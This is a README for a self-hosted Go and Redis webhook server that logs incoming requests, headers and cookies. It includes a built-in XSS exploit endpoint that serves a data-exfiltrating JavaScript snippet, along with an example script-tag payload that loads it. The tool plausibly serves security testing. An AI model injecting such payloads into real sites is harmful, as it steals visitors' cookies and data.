This project was born from the need to have a personal and fully customizable webhook service to deploy on a VPS, without relying on external tools like webhook.site, localtunnel, ngrok, or similar services. It offers flexibility for a wide range of use cases, such as request logging, payload inspection, or data collection, making it a versatile tool for developers and cybersecurity professionals alike.
The core of this project is a simple webhook server that listens for incoming HTTP requests, logs the relevant information, and stores request data in Redis. It is built with Go for the backend and uses Redis for storage. The project aims to be lightweight, flexible, and simple to set up, but with room for expansion (such as adding a dashboard).
- Data Logging: Logs requests including headers, cookies, body content, and user agent.
- Redis Integration: Store incoming request data in Redis, making it easy to scale or manage.
- XSS Exploit Script: Serve a simple exploit script for XSS attacks (stealed from xss.report).
- High customizability: Customize the server to fit your needs.
- Search Bar Support: Add a search bar for requests with RedisSearch syntax.
Below are some screenshots of the dashboard:
 |
 |
|---|---|
 |
 |
To get started with the Adh, follow the steps below:
- A machine exposed to the Internet (this tool is not a tunnelling solution such as ngrok or Localtunnel).
- Docker and Docker Compose installed on your machine.
git clone https://github.com/akiidjk/adh.git
cd adh- Modify your environment variables in the
.envfile to suit your configuration based on the provided example.
PORT=8000
ADDR=0.0.0.0
LOG_LEVEL=info
REDIS_ADDR=redis
REDIS_PORT=6379
REDIS_URL=redis://redis:6379
USER_ID=0
USER_NAME=akiidjk
USER_PASSWORD=akiidjk
SECRET_KEY=polpetta
- Now you can build and start your containers with:
docker-compose up --build -dOnce the containers are running, you can access your webhook on:
http://localhost:8000
The server will now be accepting requests on the specified port (8000 by default).
The following environment variables are available for customization:
- REDIS_ADDR: Address of the Redis server. Defaults to
localhostorredisif using Docker. - REDIS_PORT: Port for the Redis server. Defaults to
6379. - REDIS_PASS: Redis password (if needed).
- LOG_LEVEL: Log level for the application. Options are
debug,info,warn,error. Defaults toinfo. - REDIS_URL: URL of the Redis server. Defaults to
redis://localhost:6379. - USER_ID: User ID for the application. Defaults to
admin. - USER_NAME: User name for the application. Defaults to
admin. - USER_PASS: User password for the application. Defaults to
Admin. - SECRET_KEY: Secret key for the application. Defaults to
secret.
A background goroutine regularly pings Redis to ensure availability, reporting status via an internal channel. The check interval is configurable.
The application saves all logs to a folder on your host machine. The logs are stored in the ./adh-webhook/logs directory on your host system, ensuring that the logs persist even when the container is restarted or destroyed. This is done via Docker bind mounts, which map the ./adh-webhook/logs folder on your local machine to /var/log/webhook in the container.
Try sending a POST request:
curl -X POST http://localhost:8000 -H "Content-Type: application/json" -d '{"key":"value"}'Available at the /_ endpoint, Adh serves a JavaScript snippet (inspired by xss.report) that exfiltrates data via a request to your server.
Example payload:
<script src="http://localhost:8000/_"></script>Customize the domain in the script if running Adh on a different host.
- Dashboard: The current project lacks a UI dashboard to visualize requests and data. This will be added in the future.
- Authentication: Implement an authentication mechanism to restrict access to the webhook dashboard.
- Fix http problem with Docker
- Implement rate limiting to prevent abuse
- Add logout button
- Add search bar for requests
- Add clear button
Pull requests, issues, and forks are welcome! If you have an idea or fix, feel free to contribute.
Licensed under the MIT License — see the LICENSE file for details.
Adh is a self-hosted, fast, and flexible solution for managing and inspecting HTTP requests in real time. Whether you're debugging, collecting data, or simulating attacks, Adh is ready to be tailored to your workflow.